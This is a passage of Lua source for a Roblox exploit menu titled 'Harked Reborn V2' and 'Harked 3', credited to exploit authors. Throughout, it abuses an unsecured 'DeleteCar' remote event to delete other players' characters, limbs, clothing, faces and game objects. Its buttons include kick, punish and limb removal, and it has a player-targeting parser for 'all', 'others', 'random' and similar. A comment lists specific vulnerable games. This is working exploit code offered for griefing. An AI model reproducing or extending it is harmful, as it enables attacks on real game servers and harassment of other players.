do if v == newTab then editingIndex = i buildScript(memoryScripts[i].Source,0,0,true) scrollBar:ScrollTo(1) scrollBar:Update() scrollBarH:ScrollTo(1) scrollBarH:Update() end end end) newTab.Close.MouseButton1Click:connect(function() for i,v in pairs(scriptBar:GetChildren()) do if v == newTab then table.remove(memoryScripts,i) if editingIndex == i then editingIndex = #memoryScripts if editingIndex > 0 then buildScript(memoryScripts[#memoryScripts].Source,0,0,true) else buildScript("",0,0,true) end end scrollBar:ScrollTo(1) scrollBar:Update() scrollBarH:ScrollTo(1) scrollBarH:Update() for i2 = i,#scriptBar:GetChildren() do scriptBar:GetChildren()[i2].Position = scriptBar:GetChildren()[i2].Position + UDim2.new(0,-100,0,0) end if editingIndex > i then editingIndex = editingIndex - 1 end newTab:Destroy() end end end) editingIndex = #memoryScripts buildScript(scrSource,0,0,true) newTab.Parent = scriptBar end function updateScriptBar() local entryCount = 0 scriptBarLeft.Active = false scriptBarLeft.AutoButtonColor = false for i,v in pairs(scriptBarLeft["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0.7 end scriptBarRight.Active = false scriptBarRight.AutoButtonColor = false for i,v in pairs(scriptBarRight["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0.7 end for i,v in pairs(scriptBar:GetChildren()) do if v.Position.X.Offset < 0 then scriptBarLeft.Active = true scriptBarLeft.AutoButtonColor = true for i,v in pairs(scriptBarLeft["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0 end elseif v.Position.X.Offset >= 0 then entryCount = entryCount + 1 if entryCount == 5 then scriptBarRight.Active = true scriptBarRight.AutoButtonColor = true for i,v in pairs(scriptBarRight["Arrow Graphic"]:GetChildren()) do v.BackgroundTransparency = 0 end end end end end scriptBar.ChildAdded:connect(updateScriptBar) scriptBar.ChildRemoved:connect(updateScriptBar) scriptBarLeft.MouseButton1Click:connect(function() if scriptBarLeft.Active == false then return end for i,v in pairs(scriptBar:GetChildren()) do v.Position = v.Position + UDim2.new(0,100,0,0) end updateScriptBar() end) scriptBarRight.MouseButton1Click:connect(function() if scriptBarRight.Active == false then return end for i,v in pairs(scriptBar:GetChildren()) do v.Position = v.Position + UDim2.new(0,-100,0,0) end updateScriptBar() end) mouse.Button1Down:connect(function() if checkMouseInGui(editorGrid) then --print("LETS EDIT!") end end) openEvent.Event:connect(function(...) top.Visible = true local args = {...} if #args > 0 then openScript(args[1]) end end) clipboardButton.MouseButton1Click:connect(function() if Clipboard and Clipboard.set then Clipboard.set(currentSource) elseif CopyString then CopyString(currentSource) end end) closeButton.MouseButton1Click:connect(function() top.Visible = false end) --[[ local scr = script.Parent:WaitForChild("Scr") local scr2 = script.Parent:WaitForChild("Scr2") local scr3 = script.Parent:WaitForChild("Scr3") local scr4 = script.Parent:WaitForChild("TOS") local scr5 = script.Parent:WaitForChild("HW") --]] buildScript("",0,0,true) --[[ openScript(scr) openScript(scr2) openScript(scr3) openScript(scr4) openScript(scr5) --]] scrollBar:Update() scrollBarH:Update() end) --moony end) slock.Name = "slock" slock.Parent = ScrollingFrame slock.BackgroundColor3 = Color3.fromRGB(172, 172, 172) slock.BackgroundTransparency = 0.500 slock.BorderSizePixel = 0 slock.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) slock.Size = UDim2.new(0, 131, 0, 40) slock.Font = Enum.Font.SourceSansLight slock.Text = "Slock" slock.TextColor3 = Color3.fromRGB(255, 255, 255) slock.TextSize = 23.000 slock.MouseButton1Click:connect(function() if slockk then queue.Text = "Reborn by c00lkidd#1483 SLOCK: false" slockk = false else queue.Text = "Reborn by c00lkidd#1483 SLOCK: true" slockk = true end end) UIGridLayout.Parent = ScrollingFrame UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder UIGridLayout.CellPadding = UDim2.new(0, 15, 0, 15) UIGridLayout.CellSize = UDim2.new(0, 131, 0, 40) kick.Name = "kick" kick.Parent = ScrollingFrame kick.BackgroundColor3 = Color3.fromRGB(172, 172, 172) kick.BackgroundTransparency = 0.500 kick.BorderSizePixel = 0 kick.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) kick.Size = UDim2.new(0, 131, 0, 40) kick.Font = Enum.Font.SourceSansLight kick.Text = "Kick" kick.TextColor3 = Color3.fromRGB(255, 255, 255) kick.TextSize = 23.000 kick.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v]) end end) blockhead.Name = "blockhead" blockhead.Parent = ScrollingFrame blockhead.BackgroundColor3 = Color3.fromRGB(172, 172, 172) blockhead.BackgroundTransparency = 0.500 blockhead.BorderSizePixel = 0 blockhead.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) blockhead.Size = UDim2.new(0, 131, 0, 40) blockhead.Font = Enum.Font.SourceSansLight blockhead.Text = "Blockhead" blockhead.TextColor3 = Color3.fromRGB(255, 255, 255) blockhead.TextSize = 23.000 blockhead.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.Head:FindFirstChildOfClass("SpecialMesh")) end end) stools.Name = "stools" stools.Parent = ScrollingFrame stools.BackgroundColor3 = Color3.fromRGB(172, 172, 172) stools.BackgroundTransparency = 0.500 stools.BorderSizePixel = 0 stools.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) stools.Size = UDim2.new(0, 131, 0, 40) stools.Font = Enum.Font.SourceSansLight stools.Text = "Stools" stools.TextColor3 = Color3.fromRGB(255, 255, 255) stools.TextSize = 23.000 stools.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid")) repeat wait() until Players[v].Character:FindFirstChildOfClass("Humanoid").Parent == nil for _, v in ipairs(Players[v].Character:GetChildren()) do if v:IsA("BackpackItem") and v:FindFirstChild("Handle") then Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid"):EquipTool(v) end end end end) noface.Name = "noface" noface.Parent = ScrollingFrame noface.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noface.BackgroundTransparency = 0.500 noface.BorderSizePixel = 0 noface.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noface.Size = UDim2.new(0, 131, 0, 40) noface.Font = Enum.Font.SourceSansLight noface.Text = "Noface" noface.TextColor3 = Color3.fromRGB(255, 255, 255) noface.TextSize = 23.000 noface.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.Head:FindFirstChildOfClass("Decal")) end end) punish.Name = "punish" punish.Parent = ScrollingFrame punish.BackgroundColor3 = Color3.fromRGB(172, 172, 172) punish.BackgroundTransparency = 0.500 punish.BorderSizePixel = 0 punish.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) punish.Size = UDim2.new(0, 131, 0, 40) punish.Font = Enum.Font.SourceSansLight punish.Text = "Punish" punish.TextColor3 = Color3.fromRGB(255, 255, 255) punish.TextSize = 23.000 punish.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character) end end) pantsless.Name = "pantsless" pantsless.Parent = ScrollingFrame pantsless.BackgroundColor3 = Color3.fromRGB(172, 172, 172) pantsless.BackgroundTransparency = 0.500 pantsless.BorderSizePixel = 0 pantsless.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) pantsless.Size = UDim2.new(0, 131, 0, 40) pantsless.Font = Enum.Font.SourceSansLight pantsless.Text = "Pantsless" pantsless.TextColor3 = Color3.fromRGB(255, 255, 255) pantsless.TextSize = 23.000 pantsless.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) end end) shirtless.Name = "shirtless" shirtless.Parent = ScrollingFrame shirtless.BackgroundColor3 = Color3.fromRGB(172, 172, 172) shirtless.BackgroundTransparency = 0.500 shirtless.BorderSizePixel = 0 shirtless.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) shirtless.Size = UDim2.new(0, 131, 0, 40) shirtless.Font = Enum.Font.SourceSansLight shirtless.Text = "Shirtless" shirtless.TextColor3 = Color3.fromRGB(255, 255, 255) shirtless.TextSize = 23.000 shirtless.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) end end) tshirtless.Name = "tshirtless" tshirtless.Parent = ScrollingFrame tshirtless.BackgroundColor3 = Color3.fromRGB(172, 172, 172) tshirtless.BackgroundTransparency = 0.500 tshirtless.BorderSizePixel = 0 tshirtless.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) tshirtless.Size = UDim2.new(0, 131, 0, 40) tshirtless.Font = Enum.Font.SourceSansLight tshirtless.Text = "Tshirtless" tshirtless.TextColor3 = Color3.fromRGB(255, 255, 255) tshirtless.TextSize = 23.000 tshirtless.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) end end) noregen.Name = "noregen" noregen.Parent = ScrollingFrame noregen.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noregen.BackgroundTransparency = 0.500 noregen.BorderSizePixel = 0 noregen.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noregen.Size = UDim2.new(0, 131, 0, 40) noregen.Font = Enum.Font.SourceSansLight noregen.Text = "Noregen" noregen.TextColor3 = Color3.fromRGB(255, 255, 255) noregen.TextSize = 23.000 noregen.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChild("Health")) end end) stopanim.Name = "stopanim" stopanim.Parent = ScrollingFrame stopanim.BackgroundColor3 = Color3.fromRGB(172, 172, 172) stopanim.BackgroundTransparency = 0.500 stopanim.BorderSizePixel = 0 stopanim.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) stopanim.Size = UDim2.new(0, 131, 0, 40) stopanim.Font = Enum.Font.SourceSansLight stopanim.Text = "Stopanim" stopanim.TextColor3 = Color3.fromRGB(255, 255, 255) stopanim.TextSize = 23.000 stopanim.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid"):FindFirstChildOfClass("Animator")) end end) blockchar.Name = "blockchar" blockchar.Parent = ScrollingFrame blockchar.BackgroundColor3 = Color3.fromRGB(172, 172, 172) blockchar.BackgroundTransparency = 0.500 blockchar.BorderSizePixel = 0 blockchar.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) blockchar.Size = UDim2.new(0, 131, 0, 40) blockchar.Font = Enum.Font.SourceSansLight blockchar.Text = "Blockchar" blockchar.TextColor3 = Color3.fromRGB(255, 255, 255) blockchar.TextSize = 23.000 blockchar.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("CharacterMesh") then Destroy(v) end end end end) nolimbs.Name = "nolimbs" nolimbs.Parent = ScrollingFrame nolimbs.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nolimbs.BackgroundTransparency = 0.500 nolimbs.BorderSizePixel = 0 nolimbs.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nolimbs.Size = UDim2.new(0, 131, 0, 40) nolimbs.Font = Enum.Font.SourceSansLight nolimbs.Text = "Nolimbs" nolimbs.TextColor3 = Color3.fromRGB(255, 255, 255) nolimbs.TextSize = 23.000 nolimbs.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Arm"]) Destroy(Players[v].Character["Left Leg"]) Destroy(Players[v].Character["Right Arm"]) Destroy(Players[v].Character["Right Leg"]) else Destroy(Players[v].Character["LeftUpperArm"]) Destroy(Players[v].Character["LeftUpperLeg"]) Destroy(Players[v].Character["RightUpperArm"]) Destroy(Players[v].Character["RightUpperLeg"]) end end end) nola.Name = "nola" nola.Parent = ScrollingFrame nola.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nola.BackgroundTransparency = 0.500 nola.BorderSizePixel = 0 nola.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nola.Size = UDim2.new(0, 131, 0, 40) nola.Font = Enum.Font.SourceSansLight nola.Text = "Nola" nola.TextColor3 = Color3.fromRGB(255, 255, 255) nola.TextSize = 23.000 nola.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Arm"]) else Destroy(Players[v].Character["LeftUpperArm"]) end end end) noll.Name = "noll" noll.Parent = ScrollingFrame noll.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noll.BackgroundTransparency = 0.500 noll.BorderSizePixel = 0 noll.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noll.Size = UDim2.new(0, 131, 0, 40) noll.Font = Enum.Font.SourceSansLight noll.Text = "Noll" noll.TextColor3 = Color3.fromRGB(255, 255, 255) noll.TextSize = 23.000 noll.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Leg"]) else Destroy(Players[v].Character["LeftUpperLeg"]) end end end) nora.Name = "nora" nora.Parent = ScrollingFrame nora.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nora.BackgroundTransparency = 0.500 nora.BorderSizePixel = 0 nora.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nora.Size = UDim2.new(0, 131, 0, 40) nora.Font = Enum.Font.SourceSansLight nora.Text = "Nora" nora.TextColor3 = Color3.fromRGB(255, 255, 255) nora.TextSize = 23.000 nora.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Right Arm"]) else Destroy(Players[v].Character["RightUpperArm"]) end end end) norl.Name = "norl" norl.Parent = ScrollingFrame norl.BackgroundColor3 = Color3.fromRGB(172, 172, 172) norl.BackgroundTransparency = 0.500 norl.BorderSizePixel = 0 norl.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) norl.Size = UDim2.new(0, 131, 0, 40) norl.Font = Enum.Font.SourceSansLight norl.Text = "Norl" norl.TextColor3 = Color3.fromRGB(255, 255, 255) norl.TextSize = 23.000 norl.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Right Leg"]) else Destroy(Players[v].Character["RightUpperLeg"]) end end end) nowaist.Name = "nowaist" nowaist.Parent = ScrollingFrame nowaist.BackgroundColor3 = Color3.fromRGB(172, 172, 172) nowaist.BackgroundTransparency = 0.500 nowaist.BorderSizePixel = 0 nowaist.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) nowaist.Size = UDim2.new(0, 131, 0, 40) nowaist.Font = Enum.Font.SourceSansLight nowaist.Text = "Nowaist" nowaist.TextColor3 = Color3.fromRGB(255, 255, 255) nowaist.TextSize = 23.000 nowaist.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R15 then Destroy(Players[v].Character.UpperTorso.Waist) end end end) noroot.Name = "noroot" noroot.Parent = ScrollingFrame noroot.BackgroundColor3 = Color3.fromRGB(172, 172, 172) noroot.BackgroundTransparency = 0.500 noroot.BorderSizePixel = 0 noroot.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) noroot.Size = UDim2.new(0, 131, 0, 40) noroot.Font = Enum.Font.SourceSansLight noroot.Text = "Noroot" noroot.TextColor3 = Color3.fromRGB(255, 255, 255) noroot.TextSize = 23.000 noroot.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R15 then Destroy(Players[v].Character.LowerTorso.Root) end end end) top_2.Name = "top" top_2.Parent = top top_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) top_2.BackgroundTransparency = 1.000 top_2.Position = UDim2.new(0.154639184, 0, -0.333333343, 0) top_2.Size = UDim2.new(0, 200, 0, 50) top_2.Font = Enum.Font.SourceSansLight top_2.Text = "Harked Reborn V2" top_2.TextColor3 = Color3.fromRGB(255, 255, 255) top_2.TextSize = 45.000 credits.Name = "credits" credits.Parent = top credits.BackgroundColor3 = Color3.fromRGB(255, 255, 255) credits.BackgroundTransparency = 1.000 credits.Position = UDim2.new(0, 0, 1, 0) credits.Size = UDim2.new(0, 291, 0, 23) credits.Font = Enum.Font.SourceSansLight credits.Text = "Script by PandaExploits#3098, UI by Unverified" credits.TextColor3 = Color3.fromRGB(255, 255, 255) credits.TextSize = 17.000 credits.TextWrapped = true queue.Name = "queue" queue.Parent = top queue.BackgroundColor3 = Color3.fromRGB(255, 255, 255) queue.BackgroundTransparency = 1.000 queue.Position = UDim2.new(0, 0, 10.0333338, 0) queue.Size = UDim2.new(0, 292, 0, 23) queue.Font = Enum.Font.SourceSans queue.Text = "Reborn by PandaExploits#3098 (Mobile supported i think) SLOCK: false" queue.TextColor3 = Color3.fromRGB(255, 0, 4) queue.TextSize = 20.000 queue.TextWrapped = true target.Name = "target" target.Parent = top target.BackgroundColor3 = Color3.fromRGB(172, 172, 172) target.BackgroundTransparency = 0.400 target.Position = UDim2.new(0.0206185561, 0, 8.86666584, 0) target.Size = UDim2.new(0, 278, 0, 33) target.Font = Enum.Font.SourceSans target.Text = "" target.TextColor3 = Color3.fromRGB(255, 255, 255) target.TextSize = 23.000 local selectionbox = Instance.new("SelectionBox", workspace) local equipped = false local oldmouse = mouse.Icon local destroytool = Instance.new("Tool", Players.LocalPlayer:FindFirstChildOfClass("Backpack")) destroytool.RequiresHandle = false destroytool.Name = "Delete" destroytool.ToolTip = "from Harked Reborn V2" destroytool.TextureId = "http://www.roblox.com/asset/?id=12223874" destroytool.CanBeDropped = false destroytool.Equipped:connect(function() equipped = true mouse.Icon = "rbxasset://textures\\HammerCursor.png" while equipped do selectionbox.Adornee = mouse.Target wait() end end) destroytool.Unequipped:connect(function() equipped = false selectionbox.Adornee = nil mouse.Icon = oldmouse print(oldmouse) end) destroytool.Activated:connect(function() local explosion = Instance.new("Explosion", workspace) explosion.BlastPressure = 0 explosion.BlastRadius = 0 explosion.DestroyJointRadiusPercent = 0 explosion.ExplosionType = Enum.ExplosionType.NoCraters explosion.Position = mouse.Target.Position Destroy(mouse.Target) end) game:GetService("StarterGui"):SetCoreGuiEnabled('Backpack', true) Players.LocalPlayer.CharacterAdded:connect(function() local destroytool = Instance.new("Tool", Players.LocalPlayer:FindFirstChildOfClass("Backpack")) destroytool.RequiresHandle = false destroytool.Name = "Delete" destroytool.ToolTip = "from Harked Reborn V2" destroytool.TextureId = "http://www.roblox.com/asset/?id=12223874" destroytool.CanBeDropped = false destroytool.Equipped:connect(function() equipped = true mouse.Icon = "rbxasset://textures\\HammerCursor.png" while equipped do selectionbox.Adornee = mouse.Target wait() end end) destroytool.Unequipped:connect(function() equipped = false selectionbox.Adornee = nil mouse.Icon = oldmouse print(oldmouse) end) destroytool.Activated:connect(function() local explosion = Instance.new("Explosion", workspace) explosion.BlastPressure = 0 explosion.BlastRadius = 0 explosion.DestroyJointRadiusPercent = 0 explosion.ExplosionType = Enum.ExplosionType.NoCraters explosion.Position = mouse.Target.Position Destroy(mouse.Target) end) game:GetService("StarterGui"):SetCoreGuiEnabled('Backpack', true) end) end }) GUIS:AddButton({ Title = "Harked 3", Description = "Harked 3", Callback = function() --[[ harked servers: https://www.roblox.com/games/9043532917/Ramp-Jumping-On-sports-cars https://www.roblox.com/games/6816975827/Car-Suspension-Test https://www.roblox.com/games/7283842182/CrashBG-drive https://www.roblox.com/games/4456880028/Ro-Crash https://www.roblox.com/games/5752297721/Z-Bus https://www.roblox.com/games/7764872557/UPDATE-Realistic-Car-Crash-Simulator https://www.roblox.com/games/3239849876/TRAFFIC-Road-of-Car-Crash https://www.roblox.com/games/7720943627/Car-Crash-Test https://www.roblox.com/games/10592754185/BT-Drive-BETA https://www.roblox.com/games/7217128574/Car-Crashing-Simulator https://www.roblox.com/games/4643061038/Car-Crash-Test ]] local main = Instance.new("ScreenGui") local top = Instance.new("Frame") local back = Instance.new("Frame") local ScrollingFrame = Instance.new("ScrollingFrame") local bald = Instance.new("TextButton") local ragdoll = Instance.new("TextButton") local kill = Instance.new("TextButton") local naked = Instance.new("TextButton") local goto = Instance.new("TextButton") local rtools = Instance.new("TextButton") local box = Instance.new("TextButton") local sink = Instance.new("TextButton") local ban = Instance.new("TextButton") local explorer = Instance.new("TextButton") local slock = Instance.new("TextButton") local UIGridLayout = Instance.new("UIGridLayout") local kick = Instance.new("TextButton") local blockhead = Instance.new("TextButton") local stools = Instance.new("TextButton") local noface = Instance.new("TextButton") local punish = Instance.new("TextButton") local pantsless = Instance.new("TextButton") local shirtless = Instance.new("TextButton") local tshirtless = Instance.new("TextButton") local noregen = Instance.new("TextButton") local stopanim = Instance.new("TextButton") local blockchar = Instance.new("TextButton") local nolimbs = Instance.new("TextButton") local nola = Instance.new("TextButton") local noll = Instance.new("TextButton") local nora = Instance.new("TextButton") local norl = Instance.new("TextButton") local nowaist = Instance.new("TextButton") local noroot = Instance.new("TextButton") local top_2 = Instance.new("TextLabel") local credits = Instance.new("TextLabel") local queue = Instance.new("TextLabel") local target = Instance.new("TextBox") local Players = game:GetService("Players") function splitString(str,delim) local broken = {} if delim == nil then delim = "," end for w in string.gmatch(str,"[^"..delim.."]+") do table.insert(broken,w) end return broken end function toTokens(str) local tokens = {} for op,name in string.gmatch(str,"([+-])([^+-]+)") do table.insert(tokens,{Operator = op,Name = name}) end return tokens end function getRoot(char) local rootPart = char:FindFirstChild('HumanoidRootPart') or char:FindFirstChild('Torso') or char:FindFirstChild('UpperTorso') return rootPart end local WTS = function(Object) local ObjectVector = game:GetService("Workspace").CurrentCamera:WorldToScreenPoint(Object.Position) return Vector2.new(ObjectVector.X, ObjectVector.Y) end local mouse = Players.LocalPlayer:GetMouse() local MousePositionToVector2 = function() return Vector2.new(mouse.X, mouse.Y) end local GetClosestPlayerFromCursor = function() local found = nil local ClosestDistance = math.huge for i, v in pairs(Players:GetPlayers()) do if v ~= Players.LocalPlayer and v.Character and v.Character:FindFirstChildOfClass("Humanoid") then for k, x in pairs(v.Character:GetChildren()) do if string.find(x.Name, "Torso") then local Distance = (WTS(x) - MousePositionToVector2()).Magnitude if Distance < ClosestDistance then ClosestDistance = Distance found = v end end end end end return found end local SpecialPlayerCases = { ["all"] = function(speaker) return Players:GetPlayers() end, ["others"] = function(speaker) local plrs = {} for i,v in pairs(Players:GetPlayers()) do if v ~= speaker then table.insert(plrs,v) end end return plrs end, ["me"] = function(speaker)return {speaker} end, ["#(%d+)"] = function(speaker,args,currentList) local returns = {} local randAmount = tonumber(args[1]) local players = {unpack(currentList)} for i = 1,randAmount do if #players == 0 then break end local randIndex = math.random(1,#players) table.insert(returns,players[randIndex]) table.remove(players,randIndex) end return returns end, ["random"] = function(speaker,args,currentList) local players = Players:GetPlayers() local localplayer = Players.LocalPlayer table.remove(players, table.find(players, localplayer)) return {players[math.random(1,#players)]} end, ["%%(.+)"] = function(speaker,args) local returns = {} local team = args[1] for _,plr in pairs(Players:GetPlayers()) do if plr.Team and string.sub(string.lower(plr.Team.Name),1,#team) == string.lower(team) then table.insert(returns,plr) end end return returns end, ["allies"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team == team then table.insert(returns,plr) end end return returns end, ["enemies"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team ~= team then table.insert(returns,plr) end end return returns end, ["team"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team == team then table.insert(returns,plr) end end return returns end, ["nonteam"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team ~= team then table.insert(returns,plr) end end return returns end, ["friends"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr:IsFriendsWith(speaker.UserId) and plr ~= speaker then table.insert(returns,plr) end end return returns end, ["nonfriends"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if not plr:IsFriendsWith(speaker.UserId) and plr ~= speaker then table.insert(returns,plr) end end return returns end, ["guests"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Guest then table.insert(returns,plr) end end return returns end, ["bacons"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Character:FindFirstChild('Pal Hair') or plr.Character:FindFirstChild('Kate Hair') then table.insert(returns,plr) end end return returns end, ["age(%d+)"] = function(speaker,args) local returns = {} local age = tonumber(args[1]) if not age == nil then return end for _,plr in pairs(Players:GetPlayers()) do if plr.AccountAge <= age then table.insert(returns,plr) end end return returns end, ["nearest"] = function(speaker,args,currentList) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end local lowest = math.huge local NearestPlayer = nil for _,plr in pairs(currentList) do if plr ~= speaker and plr.Character then local distance = plr:DistanceFromCharacter(getRoot(speakerChar).Position) if distance < lowest then lowest = distance NearestPlayer = {plr} end end end return NearestPlayer end, ["farthest"] = function(speaker,args,currentList) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end local highest = 0 local Farthest = nil for _,plr in pairs(currentList) do if plr ~= speaker and plr.Character then local distance = plr:DistanceFromCharacter(getRoot(speakerChar).Position) if distance > highest then highest = distance Farthest = {plr} end end end return Farthest end, ["group(%d+)"] = function(speaker,args) local returns = {} local groupID = tonumber(args[1]) for _,plr in pairs(Players:GetPlayers()) do if plr:IsInGroup(groupID) then table.insert(returns,plr) end end return returns end, ["alive"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Character and plr.Character:FindFirstChildOfClass("Humanoid") and plr.Character:FindFirstChildOfClass("Humanoid").Health > 0 then table.insert(returns,plr) end end return returns end, ["dead"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if (not plr.Character or not plr.Character:FindFirstChildOfClass("Humanoid")) or plr.Character:FindFirstChildOfClass("Humanoid").Health <= 0 then table.insert(returns,plr) end end return returns end, ["rad(%d+)"] = function(speaker,args) local returns = {} local radius = tonumber(args[1]) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end for _,plr in pairs(Players:GetPlayers()) do if plr.Character and getRoot(plr.Character) then local magnitude = (getRoot(plr.Character).Position-getRoot(speakerChar).Position).magnitude if magnitude <= radius then table.insert(returns,plr) end end end return returns end, ["cursor"] = function(speaker) local plrs = {} local v = GetClosestPlayerFromCursor() if v ~= nil then table.insert(plrs, v) end return plrs end, } function onlyIncludeInTable(tab,matches) local matchTable = {} local resultTable = {} for i,v in pairs(matches) do matchTable[v.Name] = true end for i,v in pairs(tab) do if matchTable[v.Name] then table.insert(resultTable,v) end end return resultTable end function removeTableMatches(tab,matches) local matchTable = {} local resultTable = {} for i,v in pairs(matches) do matchTable[v.Name] = true end for i,v in pairs(tab) do if not matchTable[v.Name] then table.insert(resultTable,v) end end return resultTable end function getPlayersByName(Name) local Name,Len,Found = string.lower(Name),#Name,{} for _,v in pairs(Players:GetPlayers()) do if Name:sub(0,1) == '@' then if string.sub(string.lower(v.Name),1,Len-1) == Name:sub(2) then table.insert(Found,v) end else if string.sub(string.lower(v.Name),1,Len) == Name or string.sub(string.lower(v.DisplayName),1,Len) == Name then table.insert(Found,v) end end end return Found end function getPlayer(list,speaker) if list == nil then return {speaker.Name} end local nameList = splitString(list,",") local foundList = {} for _,name in pairs(nameList) do if string.sub(name,1,1) ~= "+" and string.sub(name,1,1) ~= "-" then name = "+"..name end local tokens = toTokens(name) local initialPlayers = Players:GetPlayers() for i,v in pairs(tokens) do if v.Operator == "+" then local tokenContent = v.Name local foundCase = false for regex,case in pairs(SpecialPlayerCases) do local matches = {string.match(tokenContent,"^"..regex.."$")} if #matches > 0 then foundCase = true initialPlayers = onlyIncludeInTable(initialPlayers,case(speaker,matches,initialPlayers)) end end if not foundCase then initialPlayers = onlyIncludeInTable(initialPlayers,getPlayersByName(tokenContent)) end else local tokenContent = v.Name local foundCase = false for regex,case in pairs(SpecialPlayerCases) do local matches = {string.match(tokenContent,"^"..regex.."$")} if #matches > 0 then foundCase = true initialPlayers = removeTableMatches(initialPlayers,case(speaker,matches,initialPlayers)) end end if not foundCase then initialPlayers = removeTableMatches(initialPlayers,getPlayersByName(tokenContent)) end end end for i,v in pairs(initialPlayers) do table.insert(foundList,v) end end local foundNames = {} for i,v in pairs(foundList) do table.insert(foundNames,v.Name) end return foundNames end function Destroy(instance) spawn(function() game:GetService("ReplicatedStorage").DeleteCar:FireServer(instance) end) end main.Name = "main" main.Parent = game:GetService("CoreGui") top.Name = "top" 